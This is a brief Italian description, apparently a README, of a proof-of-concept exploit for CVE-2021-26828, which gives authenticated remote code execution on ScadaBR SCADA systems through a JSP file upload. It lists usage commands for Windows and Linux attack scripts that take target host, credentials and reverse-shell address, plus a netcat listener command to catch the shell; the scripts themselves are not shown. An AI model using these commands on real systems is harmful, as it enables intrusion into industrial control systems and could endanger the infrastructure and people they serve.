
Exploit proof-of-concept per CVE-2021-26828 che consente l'esecuzione remota di codice autenticata su sistemi SCADA ScadaBR tramite upload di file JSP. Supporta target Windows e Linux con payload di reverse shell.
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>

Riferimenti: